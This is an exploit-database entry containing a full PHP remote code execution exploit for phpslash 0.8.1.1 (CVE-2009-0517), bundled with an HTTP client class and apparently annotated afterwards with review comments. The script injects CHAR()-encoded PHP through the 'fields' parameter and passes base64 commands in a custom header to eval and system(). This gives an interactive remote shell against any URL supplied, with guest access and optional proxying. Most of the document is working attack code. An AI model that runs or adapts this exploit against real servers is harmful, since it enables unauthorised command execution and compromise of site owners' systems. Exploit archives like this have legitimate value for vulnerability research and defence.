phpslash <= 0.8.1.1 - Remote Code Execution Exploit

2009-02-02T00:00:00
ID EDB-ID:7948
Type exploitdb
Reporter DarkFig
Modified 2009-02-02T00:00:00

Description

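Remote code execution exploit for phpslash <= 0.8.1.1 (CVE-2009-0517), filed as a webapps exploit for the PHP platform. The author states that it needs no account (guest access) and no special PHP configuration.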

                                        
                                            #!/usr/bin/php -q
&lt;?php
#
# phpslash &lt;= 0.8.1.1 Remote Code Execution Exploit
# - - - - - - - - - - - - - - - - - - - - - - - - - 
# RCE with no special rights (guest).
# No special PHP conditions required.
# - - - - - - - - - - - - - - - - - - - - - - - - - 
# #0 It was a private sploit, but I decided to publish
# it #1 You did the fag on that one bro, it will not happen
# again =). #2 Don't try to use it on hzv, I helped them
# to patch this one before I publish it =)
# - - - - - - - - - - - - - - - - - - - - - - - - - 
# Exploitation steps:
# 1 - include/class/tz_functions.inc tz_strftime()
# 2 - include/class/tz_functions.inc tz_generic()
# 3 - include/tz_env.class           generic()
#
# Report every error class except notices for the rest of the run.
error_reporting( E_ALL ^ E_NOTICE );

// Main function
/*
 * Interactive driver: reads commands from STDIN and sends one HTTP request
 * per command to the target given with -url.
 *
 * Observable request shape, taken from the code below (useful for log
 * review and filter rules):
 *   - GET <base>index.php?fields=CHAR(<decimal byte list>),1
 *   - request header "MypCode: <base64 text>"
 *   - request header "User-Agent: Mozilla Firefox"
 *   - a successful response carries the same 32-hex-character marker twice
 *
 * NOTE(review): the prefix "1');" only makes sense if the request value ends
 * up inside a single-quoted argument of PHP source that the server evaluates;
 * the file header names tz_strftime(), tz_generic() and generic() as the
 * path. Confirm against the phpslash source. The durable fix on the server
 * side is to never build evaluated code from request data.
 */
function main()
{
	// HTTP client class defined at the bottom of this file. The User-Agent is
	// a fixed string, not a real browser UA, and is sent on every request.
	$web = new phpsploit();
	$web-&gt;agent( 'Mozilla Firefox' );

	// Print the banner
	head();

	// Target base URL; mandatory (get_p() calls usage(), which exits, when missing)
	$url = get_p( 'url', true );
	
	// Optional proxy settings. get_p() returns true, not a string, when a
	// flag is given without a value.
	$prh = get_p( 'proxhost' );
	$pra = get_p( 'proxauth' );

	// Use a proxy ?
	if( $prh )
	{
		// host:port
		$web-&gt;proxy( $prh );
		
		// user:password for HTTP Basic proxy authentication
		if( $pra )
		$web-&gt;proxyauth( $pra );
	}
	
	// Text that closes a single-quoted string and the surrounding call
	$byp = "1');";

	// Second stage: the code to run is read from a request header, not from
	// the URL, so URL-only access logs never contain the command itself.
	// Header capture is needed to see it.
	$php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';

	// Per-run marker (md5 hex, 32 characters) printed before and after the
	// output so the client can cut it out of the page
	$s_sep = md5( rand( 0, 1000000000 ) . 'HEY_YA' );
	$c_sep = "print('$s_sep');";

	// Complete injected text; the trailing "//" comments out what follows it
	$final = $byp . $c_sep  . $php . $c_sep  . 'exit();//';

	// One request per line typed, until cmd_prompt() returns false
	while( ($cmd = cmd_prompt()) !== false )
	{
		// The command travels base64-encoded in the "MypCode" header, so no
		// quote character appears in the request (the author's
		// "magic_quotes_gpc bypass"). addheader() overwrites the previous value.
		$web-&gt;addheader( 'MypCode', base64_encode( 'system("' . add_slashes($cmd) . '");' ) );
	
		// The injected text goes into the "fields" parameter as CHAR(...),
		// followed by ",1"
		$web-&gt;get( $url . 'index.php?fields=' . to_char( $final ) . ',1' );

		// Split the response body on the marker; index 1 is the text between
		// the two markers
		$res = explode( $s_sep, $web-&gt;getcontent() );

		// Marker absent from the response: stop with exit status 1
		if( !isset( $res[1] ) )
		{
			print "\nFailed";
			exit(1);
		}
		// Marker present
		else
		{
			// empty() also treats the output "0" as no output
			if( empty( $res[1] ) )
			print "\nNo output: system() disabled OR cmd failed OR cmd without output";
			
			else
			print "\n" . $res[1];
		}
	}
	
	return;
}

// No more bug with " and $
function add_slashes( $str )
{
	// Step 1: addslashes() backslash-escapes quotes, backslashes and NUL.
	$quoted = addslashes( $str );

	// Step 2: put a backslash in front of every '$' as well, so the text is
	// inert inside a double-quoted PHP string literal (no variable expansion).
	return implode( '\\$', explode( '$', $quoted ) );
}

// Command prompt
function cmd_prompt()
{
	print "\nshell&gt;";

	// One line from STDIN, surrounding whitespace removed. At end of input
	// fgets() returns false, which trim() turns into '' (not false).
	$line = trim( fgets( STDIN ) );

	// "exit" / "quit" in any letter case end the session
	$leaving = in_array( strtolower( $line ), array( 'exit', 'quit' ) );

	return $leaving ? false : $line;
}

// MySQL CHAR() encoding
function to_char( $data )
{
	// Builds the text "CHAR(b1,b2,...)" from the byte values of $data. The
	// result contains only letters, digits, commas and parentheses, so a
	// filter that looks for quote characters never sees one; filters and log
	// searches have to look for the CHAR( form itself.
	$chars = 'CHAR(';
	$len   = strlen( $data );
	
	for( $i = 0; $i &lt; $len; $i++ )
	{
		// ord() works per byte: a multi-byte character becomes several numbers
		$chars .= ord( $data[ $i ] );
		
		// comma between values, none after the last one
		if( $i != $len-1 )
		$chars .= ',';
	}
	
	// empty input gives "CHAR()"
	return $chars . ')';
}

// CLI params
function get_p( $p, $exit = false )
{
	// Looks for the flag "-$p" in argv and returns:
	//   - the following argument, when it exists and is non-empty
	//   - true, when the flag is the last argument or its value is empty
	//   - false, when the flag is absent
	// With $exit set, the last two cases call usage(), which ends the script.
	// The returned value is not validated (it may itself be another flag).
	foreach( $_SERVER['argv'] as $key =&gt; $value )
	{
		if( $value === '-' . $p )
		{
			// empty() also rejects the literal value "0"
			if( isset( $_SERVER['argv'][ $key+1 ] ) &&
			   !empty( $_SERVER['argv'][ $key+1 ] ) )
			{					
				return $_SERVER['argv'][ $key+1 ];
			}
			else
			{
				if( $exit )
				usage();
					
				// flag present without a value; callers get a boolean here
				return true;
			}
		}
	}
		
	if( $exit )
	usage();
		
	return false;
}
	
// Headers =)
function head()
{
	// Banner text, written out in a single call; returns nothing.
	$banner = array(
		"\nphpslash &lt;= 0.8.1.1 Remote Code Execution Exploit\n",
		"-------------------------------------------------\n\n",
		" About: \n",
		"  by DarkFig  &lt; gmdarkfig (at) gmail (dot) com &gt;\n",
		"  http://acid-root.new.fr/\n",
		"  #acidroot@irc.worldnet.net\n\n",
	);

	print implode( '', $banner );

	return;
}

// Usage, can help..
function usage()
{
	// Command-line help, written out in a single call.
	$help = array(
		" Usage:\n",
		"  php spl.php -url &lt;website&gt; [options]\n\n",
		" Example:\n",
		"  php spl.php -url http://victim.com/\n\n",
		" Options:\n",
		"  -proxhost &lt;ip:port&gt; if you wanna use a proxy\n",
		"  -proxauth &lt;usr:pwd&gt; proxy with authentication\n",
	);

	print implode( '', $help );

	// Always ends the script, with status 0 even when reached through a
	// missing mandatory argument.
	exit(0);
}

// Entry point: called unconditionally, so main() also runs if this file is
// included from another script.
main();

/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 * 
 * You should have received a copy of the GNU General Public License 
 * along with this program; if not, write to the Free Software 
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
 * 
 * TITLE:          PhpSploit Class
 * REQUIREMENTS:   PHP 4 / PHP 5
 * VERSION:        2.1
 * LICENSE:        GNU General Public License
 * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
 * FILENAME:       phpsploitclass.php
 *
 * CONTACT:        gmdarkfig@gmail.com (french / english)
 * GREETZ:         Sparah, Ddx39
 *
 * DESCRIPTION:
 * The phpsploit is a class implementing a web user agent.
 * You can add cookies, headers, use a proxy server with (or without) a
 * basic authentification. It supports the GET and the POST method. It can
 * also be used like a browser with the cookiejar() function (which allow
 * a server to add several cookies for the next requests) and the
 * allowredirection() function (which allow the script to follow all
 * redirections sent by the server). It can return the content (or the
 * headers) of the request. Others useful functions can be used for debugging.
 * A manual is actually in development but to know how to use it, you can
 * read the comments.
 *
 * CHANGELOG:
 *
 * [2008-08-29] (2.1)
 *  * New: The showheader()/showcookie() functions can now return an array
 *  * Bug #3 fixed: Problem concerning some servers for the main function
 *
 * [2007-06-10] (2.0)
 *  * Code: Code optimization
 *  * New: Compatible with PHP 4 by default
 *
 * [2007-01-24] (1.2)
 *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
 *  * New: multipart/form-data enctype is now supported 
 *
 * [2006-12-31] (1.1)
 *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
 *  * New: You can now call the getheader() / getcontent() function without parameters
 *
 * [2006-12-30] (1.0)
 *  * First version
 * 
 */

class phpsploit
{
	var $proxyhost;
	var $proxyport;
	var $host;
	var $path;
	var $port;
	var $method;
	var $url;
	var $packet;
	var $proxyuser;
	var $proxypass;
	var $header;
	var $cookie;
	var $data;
	var $boundary;
	var $allowredirection;
	var $last_redirection;
	var $cookiejar;
	var $recv;
	var $cookie_str;
	var $header_str;
	var $server_content;
	var $server_header;
	

	/**
	 * This function is called by the
	 * get()/post()/formdata() functions.
	 * You don't have to call it, this is
	 * the main function.
	 *
	 * @access private
	 * @return string $this-&gt;recv ServerResponse
	 * 
	 */
	function sock()
	{
		// Plain TCP only (no TLS). No timeout argument is passed, and '@'
		// hides the reason a connect failed.
		// NOTE(review): target() appends ":port" to $this-&gt;host for ports
		// other than 80, and that same value is used as the host name in the
		// direct-connection branch; confirm this connects as intended.
		if(!empty($this-&gt;proxyhost) && !empty($this-&gt;proxyport))
		   $socket = @fsockopen($this-&gt;proxyhost,$this-&gt;proxyport);
		else
		   $socket = @fsockopen($this-&gt;host,$this-&gt;port);
	
		// Any connect failure ends the whole script
		if(!$socket)
		   die("Error: Host seems down");
		
		// Request line: $this-&gt;url is the path plus query set by target()
		if($this-&gt;method=='get')
		   $this-&gt;packet = 'GET '.$this-&gt;url." HTTP/1.1\r\n";
		   
		elseif($this-&gt;method=='post' or $this-&gt;method=='formdata')
		   $this-&gt;packet = 'POST '.$this-&gt;url." HTTP/1.1\r\n";
		   
		else
		   die("Error: Invalid method");
		
		// Basic scheme: the proxy credentials are only base64-encoded and go
		// over the unencrypted connection
		if(!empty($this-&gt;proxyuser))
		   $this-&gt;packet .= 'Proxy-Authorization: Basic '.base64_encode($this-&gt;proxyuser.':'.$this-&gt;proxypass)."\r\n";
		
		// Caller-supplied headers and cookies are concatenated as stored; no
		// CR/LF check happens here
		if(!empty($this-&gt;header))
		   $this-&gt;packet .= $this-&gt;showheader();
		   
		if(!empty($this-&gt;cookie))
		   $this-&gt;packet .= 'Cookie: '.$this-&gt;showcookie()."\r\n";

		// Header order on the wire is fixed: custom headers, Cookie, Host,
		// then "Connection: Close" with this exact capitalisation
		$this-&gt;packet .= 'Host: '.$this-&gt;host."\r\n";
		$this-&gt;packet .= "Connection: Close\r\n";
		
		if($this-&gt;method=='post')
		{
			$this-&gt;packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
			$this-&gt;packet .= 'Content-Length: '.strlen($this-&gt;data)."\r\n\r\n";
			// The CRLF appended after the data is not counted in Content-Length
			$this-&gt;packet .= $this-&gt;data."\r\n";
		}
		elseif($this-&gt;method=='formdata')
		{
			// 27 dashes here; the body built by formdata() uses 29, i.e. the
			// "--" delimiter prefix plus this boundary
			$this-&gt;packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this-&gt;boundary."\r\n";
			$this-&gt;packet .= 'Content-Length: '.strlen($this-&gt;data)."\r\n\r\n";
			$this-&gt;packet .= $this-&gt;data;
		}

		// Terminates the header section for GET; for POST/formdata it is an
		// extra CRLF after the body
		$this-&gt;packet .= "\r\n";
		$this-&gt;recv = '';

		// Return value of the write is not checked
		fputs($socket, $this-&gt;packet);

		// Reads until the peer closes the connection; there is no size limit
		// and no read timeout, and the whole response is held in memory
		while(!feof($socket))
		   $this-&gt;recv .= fgets($socket);

		fclose($socket);

		// Optional post-processing: store Set-Cookie values, follow redirects
		if($this-&gt;cookiejar)
		   $this-&gt;getcookie();

		if($this-&gt;allowredirection)
		   return $this-&gt;getredirection();
		else
		   return $this-&gt;recv;
	}
	

	/**
	 * This function allows you to add several
	 * cookies in the request.
	 * 
	 * @access  public
	 * @param   string cookn CookieName
	 * @param   string cookv CookieValue
	 * @example $this-&gt;addcookie('name','value')
	 * 
	 */
	function addcookie($cookn,$cookv)
	{
		// Create the cookie map on first use
		if(!isset($this-&gt;cookie))
		   $this-&gt;cookie = array();

		// Stored as given, without encoding; a repeated name overwrites the
		// earlier value
		$this-&gt;cookie[$cookn] = $cookv;
	}


	/**
	 * This function allows you to add several
	 * headers in the request.
	 *
	 * @access  public
	 * @param   string headern HeaderName
	 * @param   string headervalue Headervalue
	 * @example $this-&gt;addheader('Client-IP', '128.5.2.3')
	 * 
	 */
	function addheader($headern,$headervalue)
	{
		// Create the header map on first use
		if(!isset($this-&gt;header))
		   $this-&gt;header = array();
		   
		// Name and value are kept verbatim: nothing here removes CR or LF, and
		// showheader() writes them into the request as "name: value\r\n".
		// A repeated name overwrites the earlier value.
		$this-&gt;header[$headern] = $headervalue;
	}
	
	/**
	 * This function allows you to use an
	 * http proxy server. Several methods
	 * are supported.
	 * 
	 * @access  public
	 * @param   string proxy ProxyHost
	 * @param   integer proxyp ProxyPort
	 * @example $this-&gt;proxy('localhost',8118)
	 * @example $this-&gt;proxy('localhost:8118')
	 * 
	 */
	function proxy($proxy,$proxyp='')
	{
		// One-argument form: "host:port" in $proxy
		if(empty($proxyp))
		{
			// Without a ':' in $proxy, index 1 does not exist and the port
			// becomes 0 after the cast
			$proxarr = explode(':',$proxy);
			$this-&gt;proxyhost = $proxarr[0];
			$this-&gt;proxyport = (int)$proxarr[1];
		}
		// Two-argument form: host and port passed separately
		else 
		{
			$this-&gt;proxyhost = $proxy;
			$this-&gt;proxyport = (int)$proxyp;
		}

		// Only the upper bound is checked; 0 and negative values pass
		if($this-&gt;proxyport &gt; 65535)
		   die("Error: Invalid port number");
	}
	

	/**
	 * This function allows you to use an
	 * http proxy server which requires a
	 * basic authentification. Several
	 * methods are supported:
	 *
	 * @access  public
	 * @param   string proxyauth ProxyUser
	 * @param   string proxypass ProxyPass
	 * @example $this-&gt;proxyauth('user','pwd')
	 * @example $this-&gt;proxyauth('user:pwd');
	 * 
	 */
	function proxyauth($proxyauth,$proxypass='')
	{
		// One-argument form: "user:password", split at the first ':' so the
		// password may itself contain ':'
		if(empty($proxypass))
		{
			// strpos() returns false when there is no ':'; the result is not
			// checked before it is used as an offset
			$posvirg = strpos($proxyauth,':');
			$this-&gt;proxyuser = substr($proxyauth,0,$posvirg);
			$this-&gt;proxypass = substr($proxyauth,$posvirg+1);
		}
		// Two-argument form: user and password passed separately
		else
		{
			$this-&gt;proxyuser = $proxyauth;
			$this-&gt;proxypass = $proxypass;
		}
	}


	/**
	 * This function allows you to set
	 * the 'User-Agent' header.
	 * 
	 * @access  public
	 * @param   string useragent Agent
	 * @example $this-&gt;agent('Firefox')
	 * 
	 */
	function agent($useragent)
	{
		// Thin wrapper: stores the value under the 'User-Agent' header name,
		// replacing any earlier User-Agent
		$this-&gt;addheader('User-Agent',$useragent);
	}

	
	/**
	 * This function returns the headers
	 * which will be in the next request.
	 * 
	 * @access  public
	 * @return  string $this-&gt;header_str Headers
	 * @return  array  $this-&gt;head Headers
	 * @example $this-&gt;showheader()
	 * @example $this-&gt;showheader(1)
	 * 
	 */
	function showheader($array='')
	{
		// Cleared on every call, before the early returns below
		$this-&gt;header_str = '';
		
		// No header was ever added: returns null
		if(!isset($this-&gt;header))
		   return;
		   
		// Any non-empty argument selects the raw name-to-value array
		if(!empty($array))
			return $this-&gt;header;
			
		// Wire format, one "name: value" line per entry, values unmodified
		foreach($this-&gt;header as $name =&gt; $value)
		   $this-&gt;header_str .= $name.': '.$value."\r\n";
		   
		return $this-&gt;header_str;
	}

	
	/**
	 * This function returns the cookies
	 * which will be in the next request.
	 * 
	 * @access  public
	 * @return  string $this-&gt;cookie_str Cookies
	 * @return  array  $this-&gt;cookie Cookies
	 * @example $this-&gt;showcookie()
	 * @example $this-&gt;showcookie(1)
	 * 
	 */
	function showcookie($array='')
	{
		// No cookie was ever added: returns null
		if(!isset($this-&gt;cookie))
		   return;
		 
		// Any non-empty argument selects the raw name-to-value array
		if(!empty($array))
			return $this-&gt;cookie;
		
		$this-&gt;cookie_str = '';
		
		// "name=value; " per entry, values unencoded; the result keeps a
		// trailing "; "
		foreach($this-&gt;cookie as $name =&gt; $value)
		   $this-&gt;cookie_str .= $name.'='.$value.'; ';

		return $this-&gt;cookie_str;
	}


	/**
	 * This function returns the last
	 * formed http request.
	 * 
	 * @access  public
	 * @return  string $this-&gt;packet HttpPacket
	 * @example $this-&gt;showlastrequest()
	 * 
	 */
	function showlastrequest()
	{
		// Returns null until sock() has built a request; afterwards the raw
		// request text, including any Proxy-Authorization header it contains
		if(!isset($this-&gt;packet))
		   return;
		else
		   return $this-&gt;packet;
	}


	/**
	 * This function sends the formed
	 * http packet with the GET method.
	 * 
	 * @access  public
	 * @param   string url Url
	 * @return  string $this-&gt;sock()
	 * @example $this-&gt;get('localhost/index.php?var=x')
	 * @example $this-&gt;get('http://localhost:88/tst.php')
	 * 
	 */
	function get($url)
	{
		// target() splits the URL into host, port and path, and ends the
		// script when the URL has no path
		$this-&gt;target($url);
		$this-&gt;method = 'get';
		// Returns whatever sock() returns: the raw response text
		return $this-&gt;sock();
	}

	
	/**
	 * This function sends the formed
	 * http packet with the POST method.
	 *
	 * @access  public
	 * @param   string url  Url
	 * @param   string data PostData
	 * @return  string $this-&gt;sock()
	 * @example $this-&gt;post('http://localhost/','helo=x')
	 * 
	 */	
	function post($url,$data)
	{
		$this-&gt;target($url);
		$this-&gt;method = 'post';
		// $data is sent as the body exactly as passed in; the caller is
		// responsible for URL-encoding it
		$this-&gt;data = $data;
		return $this-&gt;sock();
	}
	

	/**
	 * This function sends the formed http
	 * packet with the POST method using
	 * the multipart/form-data enctype.
	 * 
	 * @access  public
	 * @param   array array FormDataArray
	 * @return  string $this-&gt;sock()
	 * @example $formdata = array(
	 *                      frmdt_url =&gt; 'http://localhost/upload.php',
	 *                      frmdt_boundary =&gt; '123456', # Optional
	 *                      'var' =&gt; 'example',
	 *                      'file' =&gt; array(
	 *                                frmdt_type =&gt; 'image/gif',  # Optional
	 *                                frmdt_transfert =&gt; 'binary' # Optional
	 *                                frmdt_filename =&gt; 'hello.php,
	 *                                frmdt_content =&gt; '&lt;?php echo 1; ?&gt;'));
	 *          $this-&gt;formdata($formdata);
	 * 
	 */
	function formdata($array)
	{
		// The frmdt_* keys are written as bare words, not quoted strings. That
		// relies on PHP's legacy fallback of reading an undefined constant as
		// its own name; since PHP 8.0 an undefined constant raises an Error.
		$this-&gt;target($array[frmdt_url]);
		$this-&gt;method = 'formdata';
		$this-&gt;data = '';
		
		// Default boundary text when the caller gives none
		if(!isset($array[frmdt_boundary]))
		   $this-&gt;boundary = 'phpsploit';
		else
		   $this-&gt;boundary = $array[frmdt_boundary];

		foreach($array as $key =&gt; $value)
		{
			// Every key except the two control keys becomes one form part.
			// The pattern is anchored at the start only, so any key that
			// begins with frmdt_url or frmdt_boundary is skipped too.
			if(!preg_match('#^frmdt_(boundary|url)#',$key))
			{
				// 29 dashes = "--" plus the 27 dashes sock() announces in the
				// Content-Type header
				$this-&gt;data .= str_repeat('-',29).$this-&gt;boundary."\r\n";
				// Field name is inserted without escaping quotes or CR/LF
				$this-&gt;data .= 'Content-Disposition: form-data; name="'.$key.'";';
				
				// Scalar value: plain form field
				if(!is_array($value))
				{
					$this-&gt;data .= "\r\n\r\n".$value."\r\n";
				}
				// Array value: file part with filename and optional type and
				// transfer encoding, all inserted as given
				else
				{
					$this-&gt;data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";

					if(isset($array[$key][frmdt_type]))
					   $this-&gt;data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";

					if(isset($array[$key][frmdt_transfert]))
					   $this-&gt;data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";

					$this-&gt;data .= "\r\n".$array[$key][frmdt_content]."\r\n";
				}
			}
		}

		// Closing delimiter
		$this-&gt;data .= str_repeat('-',29).$this-&gt;boundary."--\r\n";
		return $this-&gt;sock();
	}

	
	/**
	 * This function returns the content
	 * of the server response, without
	 * the headers.
	 * 
	 * @access  public
	 * @param   string code ServerResponse
	 * @return  string $this-&gt;server_content
	 * @example $this-&gt;getcontent()
	 * @example $this-&gt;getcontent($this-&gt;get('http://localhost/'))
	 * 
	 */
	function getcontent($code='')
	{
		// Without an argument, works on the last response stored by sock()
		if(empty($code))
		   $code = $this-&gt;recv;

		// Everything before the first blank line is treated as headers
		$code = explode("\r\n\r\n",$code);
		$this-&gt;server_content = '';
		
		// The remaining pieces are joined without the separator, so blank
		// lines (CRLF CRLF) inside the body are lost. No transfer decoding is
		// done: chunk-size lines of a chunked response stay in the result.
		for($i=1;$i&lt;count($code);$i++)
		   $this-&gt;server_content .= $code[$i];

		return $this-&gt;server_content;
	}

	
	/**
	 * This function returns the headers
	 * of the server response, without
	 * the content.
	 * 
	 * @access  public
	 * @param   string code ServerResponse
	 * @return  string $this-&gt;server_header
	 * @example $this-&gt;getcontent()
	 * @example $this-&gt;getcontent($this-&gt;post('http://localhost/','1=2'))
	 * 
	 */
	function getheader($code='')
	{
		// Without an argument, works on the last response stored by sock()
		if(empty($code))
		   $code = $this-&gt;recv;

		// Header block = everything before the first blank line, status line
		// included
		$code = explode("\r\n\r\n",$code);
		$this-&gt;server_header = $code[0];
		
		return $this-&gt;server_header;
	}

	
	/**
	 * This function is called by the
	 * cookiejar() function. It adds the
	 * value of the "Set-Cookie" header
	 * in the "Cookie" header for the
	 * next request. You don't have to
	 * call it.
	 * 
	 * @access private
	 * @param  string code ServerResponse
	 * 
	 */
	function getcookie()
	{
		// Scans the header lines of the last response
		foreach(explode("\r\n",$this-&gt;getheader()) as $header)
		{
			// Unanchored, case-insensitive match: any header line that
			// contains "set-cookie" anywhere is parsed as a cookie
			if(preg_match('/set-cookie/i',$header))
			{
				// Neither strpos() result is checked for false (no '=' or no
				// ';' on the line)
				$fequal = strpos($header,'=');
				$fvirgu = strpos($header,';');
				
				// 12=strlen('set-cookie: ')
				// The fixed offset assumes the line starts with exactly that
				// prefix followed by one space
				$cname  = substr($header,12,$fequal-12);
				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
				
				// Only name and value are kept. Attributes after the first
				// ';' (domain, path, flags) are dropped, so a stored cookie
				// is sent with every later request regardless of its host.
				$this-&gt;cookie[trim($cname)] = trim($cvalu);
			}
		}
	}


	/**
	 * This function is called by the
	 * get()/post() functions. You
	 * don't have to call it.
	 *
	 * @access  private
	 * @param   string urltarg Url
	 * @example $this-&gt;target('http://localhost/')
	 * 
	 */
	function target($urltarg)
	{
		// ereg() was removed in PHP 7.0. Anything that does not start with
		// "http://" gets that prefix, an "https://" URL included.
		if(!ereg('^http://',$urltarg))
		   $urltarg = 'http://'.$urltarg;
		
		// The return value is not checked for false (malformed URL)
		$urlarr = parse_url($urltarg);
		
		// A URL without a path ("http://host") ends the script
		if(!isset($urlarr['path']) || empty($urlarr['path']))
		   die("Error: No path precised");
		
		// Request target used in the request line: path plus query string
		$this-&gt;url  = $urlarr['path'];
		
		if(isset($urlarr['query']))
		   $this-&gt;url .= '?'.$urlarr['query'];
		
		// Port defaults to 80; the 'host' key is read without an isset() check
		$this-&gt;port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
		$this-&gt;host = $urlarr['host'];
		
		// For other ports the host value becomes "host:port"; the same
		// property is later used for the Host header
		if($this-&gt;port != '80')
		   $this-&gt;host .= ':'.$this-&gt;port;

		// Directory part of the path, used to resolve relative redirects
		$this-&gt;path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
		
		// The range check runs after the port has already been stored and used
		if($this-&gt;port &gt; 65535)
		   die("Error: Invalid port number");
	}
	
	
	/**
	 * If you call this function,
	 * the script will extract all
	 * 'Set-Cookie' headers values
	 * and it will automatically add
	 * them into the 'Cookie' header
	 * for all next requests.
	 *
	 * @access  public
	 * @param   integer code 1(enabled) 0(disabled)
	 * @example $this-&gt;cookiejar(0)
	 * @example $this-&gt;cookiejar(1)
	 * 
	 */
	function cookiejar($code)
	{
		// Loose comparison against '0' and '1'; any other value leaves the
		// current setting unchanged
		if($code=='0')
		   $this-&gt;cookiejar=FALSE;

		elseif($code=='1')
		   $this-&gt;cookiejar=TRUE;
	}


	/**
	 * If you call this function,
	 * the script will follow all
	 * redirections sent by the server.
	 * 
	 * @access  public
	 * @param   integer code 1(enabled) 0(disabled)
	 * @example $this-&gt;allowredirection(0)
	 * @example $this-&gt;allowredirection(1)
	 * 
	 */
	function allowredirection($code)
	{
		// Loose comparison against '0' and '1'; any other value leaves the
		// current setting unchanged
		if($code=='0')
		   $this-&gt;allowredirection=FALSE;
		   
		elseif($code=='1')
		   $this-&gt;allowredirection=TRUE;
	}

	
	/**
	 * This function is called if
	 * allowredirection() is enabled.
	 * You don't have to call it.
	 *
	 * @access private
	 * @return string $this-&gt;get('http://'.$this-&gt;host.$this-&gt;path.$this-&gt;last_redirection)
	 * @return string $this-&gt;get($this-&gt;last_redirection)
	 * @return string $this-&gt;recv;
	 * 
	 */
	function getredirection()
	{
		// The header name is matched anywhere in the header block and the
		// status code is not examined, so a Location, Content-Location or URI
		// header on any response counts as a redirect
		if(preg_match('/(location|content-location|uri): (.*)/i',$this-&gt;getheader(),$codearr))
		{
			$this-&gt;last_redirection = trim($codearr[2]);
			
			// get() calls sock(), which calls this method again: there is no
			// hop limit, so a redirect loop never terminates. The follow-up
			// request is always a GET and reuses the stored headers and
			// cookies, also when the new location is on another host.
			// ereg() was removed in PHP 7.0.
			if(!ereg('://',$this-&gt;last_redirection))
			   return $this-&gt;get('http://'.$this-&gt;host.$this-&gt;path.$this-&gt;last_redirection);

			else
			   return $this-&gt;get($this-&gt;last_redirection);
		}
		// No redirect header: hand back the raw response
		else
		   return $this-&gt;recv;
	}


	/**
	 * This function allows you
	 * to reset some parameters.
	 * 
	 * @access  public
	 * @param   string func Param
	 * @example $this-&gt;reset('header')
	 * @example $this-&gt;reset('cookie')
	 * @example $this-&gt;reset()
	 * 
	 */
	function reset($func='')
	{
		// 'header' or 'cookie' clears just that map; any other value (the
		// default included) clears both and switches the cookie jar and
		// redirect following off. Proxy settings and request data are never
		// touched here.
		switch($func)
		{
			case 'header':
			$this-&gt;header = array();
			break;
				
			case 'cookie':
			$this-&gt;cookie = array();
			break;
				
			default:
			// '' rather than FALSE; both are falsy where sock() tests them
			$this-&gt;cookiejar = '';
			$this-&gt;header = array();
			$this-&gt;cookie = array();
			$this-&gt;allowredirection = '';
			break;
		}
	}
}

?&gt;

# milw0rm.com [2009-02-02]